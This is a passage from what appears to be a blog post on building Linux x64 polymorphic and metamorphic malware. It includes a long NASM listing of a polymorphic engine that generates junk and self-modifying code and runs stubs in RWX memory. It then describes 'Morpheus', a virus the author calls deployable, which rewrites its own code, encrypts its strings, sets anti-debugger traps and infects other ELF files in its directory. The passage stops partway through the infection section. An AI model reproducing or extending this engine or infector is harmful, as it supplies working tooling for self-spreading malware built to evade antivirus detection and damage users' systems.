class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_count</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">JNZ_LONG</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">jmp_back</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">neg</span> <span class="nb">eax</span> <span class="nf">stosd</span> <span class="nf">ret</span> <span class="c1">; algorithm generators</span> <span class="nl">gen_add_mem_key:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">ADD_MEM_REG</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_key</span><span class="p">]</span> <span class="nf">shl</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="nl">gen_sub_mem_key:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x29</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_key</span><span class="p">]</span> <span class="nf">shl</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="nl">gen_xor_mem_key:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">XOR_MEM_REG</span> <span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_key</span><span class="p">]</span> <span class="nf">shl</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">mov</span> <span class="nb">ah</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">add</span> <span class="nb">ah</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosw</span> <span class="nf">ret</span> <span class="nl">gen_rol_mem_16:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">ROL_MEM_IMM</span> <span class="nf">add</span> <span class="nb">ah</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">16</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="nl">gen_ror_mem_16:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC1</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x08</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">16</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="c1">; basic junk</span> <span class="nl">trash:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_push_pop</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">]</span> <span class="c1">; push/pop junk</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">jb</span> <span class="nv">.push_no_rex</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x41</span> <span class="nf">stosb</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nl">.push_no_rex:</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH_REG</span> <span class="nf">stosb</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg2</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">jb</span> <span class="nv">.pop_no_rex</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x41</span> <span class="nf">stosb</span> <span class="nf">movzx</span> <span class="nb">rax</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg2</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nl">.pop_no_rex:</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">POP_REG</span> <span class="nf">stosb</span> <span class="nl">.skip_push_pop:</span> <span class="nf">call</span> <span class="nv">gen_jmp</span> <span class="nf">ret</span> <span class="c1">; jumps</span> <span class="nl">gen_jmp:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.short_jmp</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">JMP_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">stosd</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.jmp_exit</span> <span class="nl">.short_jmp:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">JMP_SHORT</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">stosb</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nl">.jmp_exit:</span> <span class="nf">ret</span> <span class="c1">; self-modifying junk</span> <span class="nl">gen_self:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">CALL_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">3</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">JMP_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x04EB</span> <span class="nf">stosw</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">lea</span> <span class="nb">rdx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">junk_reg1</span><span class="p">]</span> <span class="nf">movzx</span> <span class="nb">rdx</span><span class="p">,</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdx</span> <span class="o">+</span> <span class="nb">rax</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">POP_REG</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">PUSH_REG</span> <span class="nf">add</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">dl</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="c1">; advanced junk procedures</span> <span class="nl">gen_trash:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.try_proc2</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">CALL_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x07EB</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x55</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xE5</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">FNINIT_OPCODE</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x5D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.exit_trash</span> <span class="nl">.try_proc2:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.try_proc3</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">CALL_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x0AEB</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x60</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0xD12BC333</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x6193C38B</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x61</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.exit_trash</span> <span class="nl">.try_proc3:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.exit_trash</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">CALL_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x525010EB</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0xC069</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x90</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x2D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0xDEADC0DE</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="mh">0x585A</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nl">.exit_trash:</span> <span class="nf">ret</span> <span class="c1">; dummy procedures</span> <span class="nl">gen_dummy:</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_dummy</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">CALL_REL32</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">15</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">TEST_REG_REG</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">JZ_SHORT</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">8</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x55</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xE5</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">FNINIT_OPCODE</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">FNOP_OPCODE</span> <span class="nf">stosw</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xB8</span> <span class="nf">stosb</span> <span class="nf">stosq</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x5D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nl">.skip_dummy:</span> <span class="nf">ret</span> <span class="c1">; execute generated stub</span> <span class="nl">exec_c:</span> <span class="nf">push</span> <span class="nb">rbp</span> <span class="nf">mov</span> <span class="nb">rbp</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">32</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; stub code</span> <span class="nf">mov</span> <span class="nv">r13</span><span class="p">,</span> <span class="nb">rsi</span> <span class="c1">; stub size</span> <span class="nf">mov</span> <span class="nv">r14</span><span class="p">,</span> <span class="nb">rdx</span> <span class="c1">; payload data</span> <span class="c1">; validate input</span> <span class="nf">test</span> <span class="nv">r12</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">jz</span> <span class="nv">.error</span> <span class="nf">test</span> <span class="nv">r13</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">jz</span> <span class="nv">.error</span> <span class="nf">cmp</span> <span class="nv">r13</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">jb</span> <span class="nv">.error</span> <span class="nf">cmp</span> <span class="nv">r13</span><span class="p">,</span> <span class="mi">65536</span> <span class="nf">ja</span> <span class="nv">.error</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">9</span> <span class="c1">; mmap</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">add</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mi">4096</span> <span class="c1">; padding</span> <span class="nf">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mh">0x7</span> <span class="c1">; rwx</span> <span class="nf">mov</span> <span class="nv">r10</span><span class="p">,</span> <span class="mh">0x22</span> <span class="c1">; private|anon</span> <span class="nf">mov</span> <span class="nv">r8</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span> <span class="nf">mov</span> <span class="nv">r9</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">syscall</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span> <span class="nf">je</span> <span class="nv">.error</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.error</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="c1">; copy stub to executable memory</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">rep</span> <span class="nv">movsb</span> <span class="c1">; execute stub</span> <span class="nf">cmp</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mh">0x1000</span> <span class="nf">jb</span> <span class="nv">.error</span> <span class="nf">call</span> <span class="nb">rbx</span> <span class="c1">; cleanup</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">11</span> <span class="c1">; munmap</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nv">r13</span> <span class="nf">add</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">syscall</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">1</span> <span class="c1">; success</span> <span class="nf">jmp</span> <span class="nv">.done</span> <span class="nl">.error:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nl">.done:</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">32</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> </code></pre> </div> <h3> Current Limitations </h3> <p>At present, it is strictly limited to Linux x64 because of direct syscall dependencies: the mmap usage is customized for Linux, and register conventions are bound to x64. Porting to Windows would require adapting calling conventions and likely rewriting large parts of the engine logic. macOS has its own syscall numbers and memory protection details, so it would not run with simple changes.</p> <p>The algorithm set is deliberately limited to four variants. This scale is sufficient to prove the concept without making the system overly complex or fragile. Expanding to dozens of equivalent variants is feasible but significantly increases the risk of introducing bugs and requires careful balancing of complexity and correctness.</p> <p>There is currently no runtime recompilation mechanism: each variant is generated once and remains static during execution. Self-modifying variants could further improve evasion but introduce instability and substantially raise implementation cost.</p> <p>Future directions could include:</p> <ul> <li>Adding a syscall abstraction layer for true cross-platform support (Linux, Windows, macOS). </li> <li>Expanding the algorithm set and improving encryption/obfuscation (currently quite crude in this area). </li> <li>Building a dynamic rewriting engine that supports self-modifying payloads.</li> </ul> <p>Even in its current form, it has already achieved the core goals: functional correctness, deep signature diversity, entropy-driven key generation, intelligent junk injection, and multi-layered polymorphic structure. Implementation details can vary, but these foundational principles remain stable.</p> <p>This is a foundational polymorphic engine, intentionally designed to be “usable and clear.” You can use it first to understand the core techniques, then build upon it. Once you internalize these layers of entropy, obfuscation, and instruction encoding, you can take it in any direction you choose.</p> <h3> What Truly Makes Code Mutable </h3> <p>Metamorphic code is more than obfuscation — it rewrites itself. On every execution, it parses its own binary, locates mutable regions, and replaces them with semantically equivalent but syntactically different instruction sequences.</p> <p>For a simple task like clearing a register, you can use <code>XOR RAX, RAX</code>, <code>SUB RAX, RAX</code>, <code>MOV RAX, 0</code>, or even <code>PUSH 0; POP RAX</code>. Same effect, different opcodes. To a static scanner, these are often unrelated.</p> <p>A metamorphic engine exploits this by maintaining an instruction-level replacement catalog. Each iteration applies randomized transformations: register renaming, safe reordering of instructions, junk code insertion, and control-flow reconstruction. Logic remains unchanged, but layout continuously evolves.</p> <p>Combined with replication propagation, each infected binary carries mutations from its “parent” and adds new mutations during infection. Over time, this creates a family of functionally equivalent but structurally distinct samples. No fixed signatures, no stable patterns — only continuous evolution at the opcode level. This is why it is often called “assembly heaven.”</p> <h3> Classic Reference: MetaPHOR </h3> <p>In 2002, there was a very solid article dissecting metamorphic engine structure: The Mental Driller’s “How I Made MetaPHOR and What I’ve Learned.” Yes, 2002 — ancient by today’s standards, but the core principles remain strikingly relevant. Some adaptation is needed for modern systems, but the underlying mechanisms are still solid.</p> <p>Polymorphism focuses on camouflage: adjusting the decryptor, wrapping the payload, keeping the core static. Metamorphism discards the shell and directly modifies the interior. It disassembles complete code blocks, rewrites them from scratch, and reassembles the binary — producing new logical layouts, altered control flow, and shifted instruction patterns. Every landing looks different.</p> <p>It is not just renaming registers or sprinkling NOPs. It is full-code-level mutation — deep structural churning that leaves no stable anchor points for static fingerprints.</p> <h3> — Disassembly and Shrinking — </h3> <p>To mutate, a virus (VX) must first disassemble itself into an internal pseudo-assembly format — a custom abstraction layer that makes original opcodes readable and transformable. It breaks apart its instruction stream, decodes jumps, calls, and conditional branches, then maps control flow into manageable data structures.</p> <p>After disassembly, the code is written into a memory buffer. Pointer tables are built for jump targets, call destinations, and other critical control elements to ensure relationships are not broken during rewriting.</p> <p>Next comes the <strong>shrinker</strong>. This stage scans for bloated instruction sequences and compresses them into minimal equivalent forms.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Original Instruction</th> <th>Compressed Instruction</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>MOV reg, reg</td> <td>NOP</td> <td>Dead operation with no effect</td> </tr> <tr> <td>XOR reg, reg</td> <td>MOV reg, 0</td> <td>Clear the register</td> </tr> </tbody> </table></div> <p>The shrinker’s job is to trim fat: fold redundant chains, clean up leftovers, and free space for the next round of mutation.</p> <h3> — Permutation and Expansion — </h3> <p>After shrinking comes the <strong>permutator</strong>. Its task is shuffling: reordering instructions and injecting entropy while keeping logic intact, making layout unpredictable.</p> <p>It also replaces equivalent instructions: same result, different operation.</p> <p>Following permutation is the <strong>expander</strong> — the opposite of the shrinker. It expands single instructions into equivalent two- or three-instruction sequences. Recursive expansion continuously increases code complexity.</p> <p>Control variables impose hard limits to prevent unbounded growth.</p> <p>Finally, the <strong>assembler</strong> finishes the job: it reassembles the mutated code back into valid machine code.</p> <p>Only after completing this loop does the VX become a structurally unique but functionally complete new variant. Payload unchanged, appearance brand new.</p> <h3> — Generational Generation — </h3> <p>You have seen how we do this in polymorphism: injecting junk code and replacing registers. Metamorphic thinking is similar but goes much deeper.</p> <p>When the VX completes its self-rewrite in memory, it writes the new variant back to disk. Every execution produces a “new copy” containing random junk code and rewritten logic.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhd4g54d9yf1p9bjsotcp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhd4g54d9yf1p9bjsotcp.png" alt=" " width="800" height="320"></a></p> <h3> vx-junk-disasm </h3> <p>Notice those JUNK macro calls? They are randomly scattered. Each is a marker — a hook point that can be safely modified. Smart Trash: deliberately useless, designed specifically to interfere with disassemblers and scanners.</p> <p>We use a dedicated scanning function to handle them. It traverses the code, looks for PUSH/POP patterns on the same registers (spaced 8 bytes apart), and marks the hit locations. Once marked, these junk segments are overwritten with new, harmless, randomized replacement sequences.</p> <p>This loop is the core. It hunts for JUNK sequences and replaces them with new random instruction chains on every run. Each JUNK call marks a modifiable slot — essentially a sandboxed code region for generational mutation. Behavior harmless, structure chaotic.</p> <p>After mutation completes, the VX propagates by copying the new variant into executable files discovered in the same directory. The copy has changed structure but unchanged behavior. True polymorphic/metamorphic malware is not about “fooling AV once,” but about continuous mutation — reshaping the binary with every “breath.” As long as logic remains intact and structure keeps changing, static detection struggles to gain a foothold.</p> <p>This is only the minimal viable set, covering the key mechanisms. It demonstrates the core path that allows VX code to mutate and survive. There is much more to deeper content, but this is the foundation.</p> <h3> Morpheus </h3> <p>Now it is time for the code I mentioned alongside Veil64 to make its appearance.</p> <p><strong>Morpheus</strong> applies metamorphic principles to a real, runnable virus infector. This is not a theoretical demonstration — it is practical and deployable. It shows how a mutation engine can work end-to-end without relying on encryptors or packers.</p> <p>The core idea is simple: Morpheus treats its own executable code the way a crypter treats a payload. It loads itself into memory, scans for known patterns, applies transformations, then writes out a mutated version that accomplishes the same tasks with different instruction sequences.</p> <p>On every run, Morpheus roughly does the following:</p> <ul> <li>Extracts obfuscated strings and executes its logic </li> <li>Loads its own <code>.text</code> section </li> <li>Disassembles code blocks </li> <li>Identifies mutation points (NOPs, junk patterns, simple MOV/XOR operations, etc.) </li> <li>Applies transformations (register shuffling, instruction replacement, code block reordering or expansion) </li> <li>Generates structurally different but logically consistent code </li> <li>Writes the mutated binary to a new target (usually another ELF in the same directory) </li> <li>Patches headers as needed to keep it executable </li> </ul> <p>Every generation is truly different — not just added junk and register swaps, but substantive structural change — while the payload and functionality remain fully intact. This allows Morpheus to self-replicate on every execution, rendering static signature detection unreliable. Combined with runtime transformation and actual rewriting of files on disk, traditional scanning methods struggle to track it consistently.</p> <p>Junk code is always a balancing act. In Veil64 we used relatively basic junk padding. Here is a 10-byte sequence that has zero net effect but can easily be mistaken for compiler-generated register preservation code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="nf">PUSH</span> <span class="nb">RAX</span> <span class="nf">PUSH</span> <span class="nb">RBX</span> <span class="nf">XCHG</span> <span class="nb">RAX</span><span class="p">,</span> <span class="nb">RBX</span> <span class="nf">XCHG</span> <span class="nb">RAX</span><span class="p">,</span> <span class="nb">RBX</span> <span class="nf">POP</span> <span class="nb">RBX</span> <span class="nf">POP</span> <span class="nb">RAX</span> </code></pre> </div> <p>Morpheus makes heavy use of such sequences. The JUNK macro marks these blocks, and on every execution the engine scans and replaces them with structurally different but functionally equivalent junk patterns.</p> <p>We implemented four register combinations for smart junk patterns. Each variant follows the same logic but uses different register pairs, producing unique byte sequences. These variants are functionally identical with zero side effects, yet their binary signatures change completely.</p> <h3> String Encryption </h3> <p>All strings are encrypted to evade static signature detection. I used a simple XOR scheme: each string gets its own key, and decryption is a single XOR pass. Why XOR? Because it is fast.</p> <p>Decryption runs once at startup. To add extra resistance, I included INT3 trap shellcode to disrupt debugger flow.</p> <h3> — Infection — </h3> <p>During the infection stage, we scan the directory for ELF binaries. The scanner performs several basic checks to filter out garbage files and retain only viable ELF executable targets (regular files, no hidden files, valid ELF magic, executable and writable permissions).</p> <p>Before any overwrite, it creates a hidden backup 